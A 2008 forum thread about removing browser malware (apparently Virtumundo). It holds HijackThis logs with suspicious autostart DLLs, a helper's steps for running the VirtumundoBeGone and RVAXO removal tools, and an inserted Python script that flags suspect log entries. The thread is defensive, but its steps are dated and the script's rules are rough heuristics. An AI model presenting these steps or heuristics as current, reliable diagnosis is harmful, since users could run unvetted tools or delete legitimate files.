Popups + slow computer + log

    Hi,

    I probably downloaded some kind of spam and am now stuck with strange popups (IE and Firefox). The computer is also slower than normal. I have already run adaware and Spambot Search & Destroy. Here is my log...

    Logfile of Trend Micro HijackThis v2.0.0 (BETA)
    Scan saved at 14:30:30, on 23-3-2008
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\Ati2evxx.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Windows Defender\MsMpEng.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
    C:\WINDOWS\system32\Ati2evxx.exe
    C:\Program Files\Norman\Npm\Bin\Zanda.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
    C:\Program Files\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
    C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
    C:\Program Files\Norman\Nvc\bin\nvcoas.exe
    C:\WINDOWS\System32\alg.exe
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
    C:\Program Files\Windows Defender\MSASCui.exe
    C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
    C:\Program Files\Norman\Npm\bin\ZLH.EXE
    C:\Program Files\Norman\Nvc\BIN\NIP.EXE
    C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
    C:\Program Files\Norman\Nvc\bin\cclaw.exe
    C:\WINDOWS\vsnpstd.exe
    C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
    C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Winamp\winampa.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\WINDOWS\system32\Rundll32.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Skype\Phone\Skype.exe
    C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Messenger\msmsgs.exe
    C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
    C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\acrobat_sl.exe
    C:\Program Files\Google\Google Updater\GoogleUpdater.exe
    C:\Program Files\Skype\Plugin Manager\skypePM.exe
    C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
    C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Internet Explorer\iexplore.exe
    C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLLoginProxy.exe
    C:\Documents and Settings\Jeroen\Bureaublad\HiJackThis_v2.exe
    C:\WINDOWS\system32\wbem\wmiprvse.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.pokerweblogs.com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
    F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: (no name) - {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} - C:\WINDOWS\system32\hgggffg.dll
    O2 - BHO: (no name) - {4E138131-FDFB-42EB-B92D-2BB0975448BB} - C:\WINDOWS\system32\mlljh.dll
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
    O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
    O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
    O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
    O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
    O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
    O4 - HKLM\..\Run: [Norman ZANDA] C:\Program Files\Norman\Npm\bin\ZLH.EXE /LOAD /SPLASH
    O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
    O4 - HKLM\..\Run: [Thunderbird] "C:\Program Files\Mozilla Thunderbird\thunderbird.exe"
    O4 - HKLM\..\Run: [snpstd] C:\WINDOWS\vsnpstd.exe
    O4 - HKLM\..\Run: [Adobe Version Cue CS2] "C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe"
    O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
    O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
    O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
    O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
    O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
    O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
    O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu2000352.exe 61A847B5BBF72810329B385577FB01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
    O4 - HKLM\..\Run: [b89e5dfb] rundll32.exe "C:\WINDOWS\system32\xuurokys.dll",b
    O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
    O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
    O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    O4 - HKCU\..\Run: [LClock] C:\Program Files\LClock\LClock.exe
    O4 - HKCU\..\Run: [Vista Sidebar] C:\Program Files\Vista Sidebar\sidebar.exe
    O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
    O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
    O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
    O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Lokale service')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Netwerkservice')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O4 - Global Startup: Adobe Acrobat Speed Launcher.lnk = ?
    O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
    O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
    O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
    O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201884219671
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
    O16 - DPF: {D83C1BD1-DCBB-11D4-9425-0050BF33FA6E} (CycloScopeLite Control) - http://www.cyclomedia.nl/download/components/CycloScopeLite.cab
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
    O20 - Winlogon Notify: hgggffg - C:\WINDOWS\SYSTEM32\hgggffg.dll
    O22 - SharedTaskScheduler: Preloader van browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
    O22 - SharedTaskScheduler: Cache-daemon voor onderdeelcategorieën - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: Adobe Version Cue CS2 - Adobe Systems Incorporated - C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
    O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
    O23 - Service: Norman eLogger service 6 (eLoggerSvc6) - Norman ASA - C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
    O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
    O23 - Service: Norman NJeeves - Unknown owner - C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
    O23 - Service: Norman ZANDA - Norman ASA - C:\Program Files\Norman\Npm\Bin\Zanda.exe
    O23 - Service: Norman Virus Control on-access component (nvcoas) - Norman ASA - C:\Program Files\Norman\Nvc\bin\nvcoas.exe
    O23 - Service: Norman Virus Control Scheduler (NVCScheduler) - Norman ASA - C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
    O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
    O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
    O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe

    --
    End of file - 13721 bytes

  • #2
    Download VirtumundoBeGone (mirror)
    Save it to your desktop.

    Double-click VirtumundoBeGone.exe and follow the instructions.
    Don't be alarmed if you see a blue screen with an error message - this is normal.
    When the fix has finished, restart the PC.
    Post the contents of the log file VBG.TXT, which is now on your desktop, here in your next message.


    Download: RVAXO.exe
    • Save the file to your desktop, double-click it and choose "Unzip" to extract it.
    • Start the computer in safe mode.

      Start HijackThis once more and tick only the following lines:
      O2 - BHO: (no name) - {4E138131-FDFB-42EB-B92D-2BB0975448BB} - C:\WINDOWS\system32\mlljh.dll
      O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu2000352.exe 61A847B5BBF72810329B385577FB01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
      O4 - HKLM\..\Run: [b89e5dfb] rundll32.exe "C:\WINDOWS\system32\xuurokys.dll",b
      O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s

      Close all open windows (except HijackThis), then click "Fix checked" and close HijackThis.

    • Now open the RVAXO folder on your desktop and double-click RunMe.cmd
      A cmd window will open, and a few lines about files that were not found will quickly scroll past; this is normal.
    • An uninstaller for a rogue scanner may also start; do not close it, but follow any instructions and simply let it do its work.
    • After that your PC will restart; let it boot in normal mode this time. After the restart the RVAXO cmd window opens again.
      Let it run and wait until a log file opens: C:\RVAXO-results.log
    • If your computer does not restart by itself, or the tool does not start after the reboot, do this manually.
    • Post the contents of the log file in your next message.

    Also post a new HijackThis log.

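The check that the VirtumundoBeGone log later in this thread reports (a BHO with no name whose DLL name also appears as a Winlogon Notify key), applied to HijackThis lines; this is an added Python example, not part of the original posts and not code from either tool. The two "review" rules (a nameless BHO in system32, a Run value that loads a system32 DLL through rundll32) are assumptions modelled on the entries selected for fixing above, and the sample lines are an excerpt of the first log in the thread.

```python
import ntpath  # Windows path rules, usable on any OS
import re
from collections import namedtuple

# Excerpt of the first HijackThis log in this thread (suspect and benign lines).
SAMPLE_LOG = r"""
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} - C:\WINDOWS\system32\hgggffg.dll
O2 - BHO: (no name) - {4E138131-FDFB-42EB-B92D-2BB0975448BB} - C:\WINDOWS\system32\mlljh.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [b89e5dfb] rundll32.exe "C:\WINDOWS\system32\xuurokys.dll",b
O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
O20 - Winlogon Notify: hgggffg - C:\WINDOWS\SYSTEM32\hgggffg.dll
"""

Finding = namedtuple("Finding", "level reason target")

# The BHO name may itself contain " - ", so anchor on the CLSID that follows it.
BHO_RE = re.compile(
    r"^O2 - BHO: (?P<name>.*) - (?P<clsid>\{[0-9A-Fa-f-]{36}\}) - (?P<path>.+)$")
NOTIFY_RE = re.compile(r"^O20 - Winlogon Notify: (?P<key>.+?) - (?P<path>.+)$")
RUN_RE = re.compile(r"^O4 - \S+\\\.\.\\Run: \[(?P<value>[^\]]*)\] (?P<cmd>.+)$")
RUNDLL_RE = re.compile(r'^rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+\.dll)"?,', re.I)


def in_system32(path):
    """True when the file sits directly in a ...\\system32 directory."""
    return ntpath.dirname(path).lower().endswith("\\system32")


def triage(log_text):
    """Return Findings for HijackThis lines that deserve a closer look."""
    lines = [ln.strip() for ln in log_text.splitlines() if ln.strip()]

    # Pass 1: collect Winlogon Notify key names (O20 lines).
    notify_keys = set()
    for ln in lines:
        m = NOTIFY_RE.match(ln)
        if m:
            notify_keys.add(m.group("key").lower())

    # Pass 2: correlate nameless BHOs with those keys, then look at Run values.
    findings = []
    for ln in lines:
        m = BHO_RE.match(ln)
        if m:
            if m.group("name") != "(no name)":
                continue
            dll = m.group("path")
            stem = ntpath.splitext(ntpath.basename(dll))[0].lower()
            if stem in notify_keys:
                # The correlation VirtumundoBeGone logs as "probably Virtumundo".
                findings.append(Finding(
                    "high", "nameless BHO also registered under Winlogon Notify",
                    ntpath.basename(dll)))
            elif in_system32(dll):
                # Assumption: nameless BHO in system32 is worth a manual check.
                findings.append(Finding(
                    "review", "nameless BHO in system32, no Winlogon Notify key",
                    ntpath.basename(dll)))
            continue

        m = RUN_RE.match(ln)
        if m:
            r = RUNDLL_RE.match(m.group("cmd"))
            # Assumption: autostart of a system32 DLL via rundll32 is a lead.
            if r and in_system32(r.group("dll")):
                findings.append(Finding(
                    "review", "Run value loads a system32 DLL through rundll32",
                    ntpath.basename(r.group("dll"))))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.level:6} {f.target:14} {f.reason}")
```

A "review" finding is a lead for manual checking, not a verdict: SDHelper.dll is also a nameless BHO and is left alone here because it is neither in system32 nor referenced by Winlogon Notify.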


    • #3
      HijackThis log:
      Logfile of Trend Micro HijackThis v2.0.0 (BETA)
      Scan saved at 15:47:48, on 23-3-2008
      Platform: Windows XP SP2 (WinNT 5.01.2600)
      Boot mode: Normal

      Running processes:
      C:\WINDOWS\System32\smss.exe
      C:\WINDOWS\system32\csrss.exe
      C:\WINDOWS\system32\winlogon.exe
      C:\WINDOWS\system32\services.exe
      C:\WINDOWS\system32\lsass.exe
      C:\WINDOWS\system32\Ati2evxx.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\svchost.exe
      C:\Program Files\Windows Defender\MsMpEng.exe
      C:\WINDOWS\System32\svchost.exe
      C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
      C:\Program Files\Norman\Npm\Bin\Zanda.exe
      C:\WINDOWS\system32\Ati2evxx.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\spoolsv.exe
      C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
      C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
      C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
      C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
      C:\WINDOWS\system32\svchost.exe
      C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
      C:\Program Files\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
      C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
      C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
      C:\Program Files\Norman\Nvc\bin\nvcoas.exe
      C:\WINDOWS\System32\alg.exe
      C:\WINDOWS\Explorer.EXE
      C:\WINDOWS\RTHDCPL.EXE
      C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
      C:\Program Files\Windows Defender\MSASCui.exe
      C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
      C:\Program Files\Norman\Npm\bin\ZLH.EXE
      C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
      C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
      C:\Program Files\Norman\Nvc\BIN\NIP.EXE
      C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
      C:\Program Files\Norman\Nvc\bin\cclaw.exe
      C:\Program Files\iTunes\iTunesHelper.exe
      C:\Program Files\Winamp\winampa.exe
      C:\WINDOWS\system32\ctfmon.exe
      C:\Program Files\Skype\Phone\Skype.exe
      C:\Program Files\iPod\bin\iPodService.exe
      C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
      C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
      C:\Program Files\Messenger\msmsgs.exe
      C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
      C:\Program Files\Google\Google Updater\GoogleUpdater.exe
      C:\Program Files\Skype\Plugin Manager\skypePM.exe
      C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
      C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
      C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLLoginProxy.exe
      C:\Program Files\Mozilla Firefox\firefox.exe
      C:\Program Files\Internet Explorer\iexplore.exe
      C:\Documents and Settings\Jeroen\Bureaublad\HiJackThis_v2.exe
      C:\WINDOWS\system32\wbem\wmiprvse.exe

      R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.pokerweblogs.com/
      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
      R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
      F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
      O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
      O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
      O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
      O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
      O2 - BHO: (no name) - {907482A4-6676-415C-AFBD-0564A8A2810A} - C:\WINDOWS\system32\mlljh.dll
      O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
      O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
      O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
      O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
      O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
      O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"
      O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
      O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
      O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
      O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
      O4 - HKLM\..\Run: [Norman ZANDA] C:\Program Files\Norman\Npm\bin\ZLH.EXE /LOAD /SPLASH
      O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
      O4 - HKLM\..\Run: [Thunderbird] "C:\Program Files\Mozilla Thunderbird\thunderbird.exe"
      O4 - HKLM\..\Run: [Adobe Version Cue CS2] "C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe"
      O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
      O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
      O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
      O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
      O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
      O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
      O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
